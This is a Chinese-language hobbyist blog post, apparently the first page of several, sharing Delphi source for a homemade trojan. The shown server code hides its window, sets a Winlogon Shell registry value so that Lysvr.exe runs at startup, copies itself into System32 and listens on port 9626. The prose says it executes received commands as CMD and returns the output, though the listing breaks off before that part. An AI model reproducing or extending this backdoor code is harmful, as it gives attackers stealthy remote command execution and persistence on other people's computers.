剛學電腦時很喜歡網絡安全,看著高手們寫的一個又一個攻擊工具,自己也總想努力去學好編程去寫屬於自己的程序。學Delphi快一年了,感覺什麼都沒學到,慚愧啊。今晚突然想學著寫木馬,於是手忙腳亂的敲了點代碼,超簡單,願自己能越寫越好!!! 程序跟傳統木馬一樣,分服務端和客戶端。運行服務端後會復制自身到SYSTEM32目錄下面,並在注冊表添加一自動行啟動項,打開本機9626端口開始等待接收客戶端的數據。當接收到客戶端數據時就當作CMD命令去執行,最後把回顯傳送回客戶端。客戶端很簡單,跟服務端連接成功後,輸入命令點執行,正常的話可以收到服務端的執行結果了。
源碼如下:
////Server.pas//////////////
unit UtMain;
////////////////////////////////////
//////////BY lanyus////////////////
////////Email:[email protected]////
////////QQ:231221////////////////
///部分代碼從網上收集///////////
////////////////////////////////
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, Registry, ScktComp, StdCtrls;
type
TFmMain = class(TForm)
SS: TServerSocket;
Memo1: TMemo;
procedure FormCreate(Sender: TObject);
procedure SSAccept(Sender: TObject; Socket: TCustomWinSocket);
procedure SSClIEntRead(Sender: TObject; Socket: TCustomWinSocket);
private
{ Private declarations }
public
{ Public declarations }
end;
var
FmMain: TFmMain;
reg:TRegistry;
implementation
{$R *.dfm}
procedure TFmMain.FormCreate(Sender: TObject);
var
sysdir:array[0..50] of char;
begin
Application.ShowMainForm:=False;
FmMain.Left:=-200; //運行不顯示窗口
reg:=TRegistry.Create;
reg.RootKey:=HKEY_LOCAL_MacHINE;
reg.OpenKey('SoftWareMicrosoftWindows NTCurrentVersionWinlogon',true);
if reg.ReadString('Shell')<> 'Explorer.exe Lysvr.exe' then
reg.WriteString('Shell','Explorer.exe Lysvr.exe'); //建立開機啟動項
reg.Free;
GetSystemDirectory(sysdir,50);
if not FileExists(sysdir+'Lysvr.exe') then
copyfile(Pchar(Application.exeName),pchar(sysdir+'Lysvr.exe'),true);
SS.Port:=9626;
try
SS.Active:=True;
except
end;
end;
procedure TFmMain.SSAccept(Sender: TObject; Socket: TCustomWinSocket);
begin
Socket.SendText('連接成功'); //發現有連接時回傳‘連接成功 ’
end;
procedure TFmMain.SSClIEntRead(Sender: TObject; Socket: TCustomWinSocket);
var
RemoteCmd:string;
hReadPipe,hWritePipe:THandle;
si:STARTUPINFO;
lsa:SECURITY_ATTRIBUTES;
pi:PROCESS_INFO
[1] [2] [3] 下一頁
